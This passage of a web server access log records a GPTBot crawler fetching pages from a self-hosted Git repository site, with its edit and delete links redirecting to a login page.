74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_edit/main/asset_pilot_docker/.venv/bin/pip" -[17/Feb/2026:18:06:36 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_edit/main/asset_pilot_docker/.venv/bin/dotenv" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/dotenv" -[17/Feb/2026:18:06:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_edit/main/asset_pilot_docker/.venv/bin/dotenv" -[17/Feb/2026:18:06:36 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_delete/main/asset_pilot_docker/.venv/bin/dotenv" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/dotenv" -[17/Feb/2026:18:06:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_delete/main/asset_pilot_docker/.venv/bin/dotenv" -[17/Feb/2026:18:06:37 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_edit/main/asset_pilot_docker/.venv/bin/activate.csh" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/activate.csh" -[17/Feb/2026:18:06:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_edit/main/asset_pilot_docker/.venv/bin/activate.csh" -[17/Feb/2026:18:06:37 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_delete/main/asset_pilot_docker/.venv/bin/activate.csh" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/activate.csh" -[17/Feb/2026:18:06:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_delete/main/asset_pilot_docker/.venv/bin/activate.csh" -[17/Feb/2026:18:06:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 9981] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:18:06:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 9980] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:18:06:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 9981] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:18:06:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 21734] [Gzip 28.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:18:06:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 21737] [Gzip 28.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:18:06:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 21737] [Gzip 28.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:18:06:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/asset_pilot_docker/.venv/bin/activate.csh" [Client 74.7.227.38] [Length 9841] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/activate.csh" -[17/Feb/2026:18:06:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/asset_pilot_docker/.venv/bin/pip" [Client 74.7.227.38] [Length 9837] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/pip" -[17/Feb/2026:18:06:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/.venv/bin/activate.csh" [Client 74.7.227.38] [Length 11703] [Gzip 4.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/activate.csh" -[17/Feb/2026:18:06:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/static/js/app.js" [Client 74.7.227.38] [Length 37283] [Gzip 12.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/static/js/app.js" -[17/Feb/2026:18:06:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/.venv/bin/dotenv" [Client 74.7.227.38] [Length 10669] [Gzip 3.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/dotenv" -[17/Feb/2026:18:06:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/asset_pilot_docker/static/js/app.js" [Client 74.7.227.38] [Length 10077] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/static/js/app.js" -[17/Feb/2026:18:06:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/asset_pilot_docker/.venv/bin/dotenv" [Client 74.7.227.38] [Length 9836] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/dotenv" -[17/Feb/2026:18:06:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/branch/main/asset_pilot_docker/static/js/app.js" [Client 74.7.227.38] [Length 17770] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/static/js/app.js" -[17/Feb/2026:18:06:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/.venv/bin/pip" [Client 74.7.227.38] [Length 10679] [Gzip 3.30] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/pip" -[17/Feb/2026:18:06:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/branch/main/asset_pilot_docker/.venv/bin/dotenv" [Client 74.7.227.38] [Length 256] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/dotenv" -[17/Feb/2026:18:06:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/branch/main/asset_pilot_docker/.venv/bin/pip" [Client 74.7.227.38] [Length 265] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/pip" -[17/Feb/2026:18:06:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/branch/main/asset_pilot_docker/.venv/bin/activate.csh" [Client 74.7.227.38] [Length 946] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/activate.csh" -[17/Feb/2026:18:06:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/rss/branch/main/asset_pilot_docker/.venv/bin/activate.csh" [Client 74.7.227.38] [Length 967] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/activate.csh" -[17/Feb/2026:18:06:48 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_new/main/asset_pilot_docker/.venv/bin/activate.csh" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/.venv/bin/activate.csh" -[17/Feb/2026:18:06:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_new/main/asset_pilot_docker/.venv/bin/activate.csh" -[17/Feb/2026:18:06:48 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_new/main/asset_pilot_docker/static/js/app.js" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/static/js/app.js" -[17/Feb/2026:18:06:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_new/main/asset_pilot_docker/static/js/app.js" -[17/Feb/2026:18:06:49 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_new/main/asset_pilot_docker/.venv/bin/dotenv" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/.venv/bin/dotenv" -[17/Feb/2026:18:06:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_new/main/asset_pilot_docker/.venv/bin/dotenv" -[17/Feb/2026:18:06:50 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/.venv/bin/dotenv" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/.venv/bin/dotenv" -[17/Feb/2026:18:06:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/.venv/bin/dotenv" -[17/Feb/2026:18:06:50 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/.venv/bin/activate.csh" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/.venv/bin/activate.csh" -[17/Feb/2026:18:06:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/.venv/bin/activate.csh" -[17/Feb/2026:18:06:51 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/static/js/app.js" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/static/js/app.js" -[17/Feb/2026:18:06:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/static/js/app.js" -[17/Feb/2026:18:06:51 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_new/main/asset_pilot_docker/.venv/bin/pip" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/.venv/bin/pip" -[17/Feb/2026:18:06:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_new/main/asset_pilot_docker/.venv/bin/pip" -[17/Feb/2026:18:06:52 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/.venv/bin/pip" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/.venv/bin/pip" -[17/Feb/2026:18:06:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/.venv/bin/pip" -[17/Feb/2026:18:06:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/rss/branch/main/asset_pilot_docker/static/js/app.js" [Client 74.7.227.38] [Length 1424] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/static/js/app.js" -[17/Feb/2026:18:06:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/rss/branch/main/asset_pilot_docker/.venv/bin/pip" [Client 74.7.227.38] [Length 949] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/pip" -[17/Feb/2026:18:06:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 12664] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:18:06:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 12664] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:18:06:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 12664] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:18:06:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10010] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&project=-1&state=all&type=all" -[17/Feb/2026:18:06:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&state=all&type=all" [Client 74.7.227.38] [Length 9930] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&project=-1&state=all&type=all" -[17/Feb/2026:18:06:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&state=all&type=all" [Client 74.7.227.38] [Length 10163] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&milestone=-1&state=all&type=all" -[17/Feb/2026:18:06:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 13606] [Gzip 4.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:18:06:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-cpp-28b735f6cb18e002ddf0.json" [Client 74.7.227.38] [Length 11619] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply" -[17/Feb/2026:18:06:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 12780] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:18:06:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 12778] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:18:06:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/cmakeFiles-v1-c9ada5131af9e23965da.json" [Client 74.7.227.38] [Length 19984] [Gzip 9.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply" -[17/Feb/2026:18:06:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 13607] [Gzip 4.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 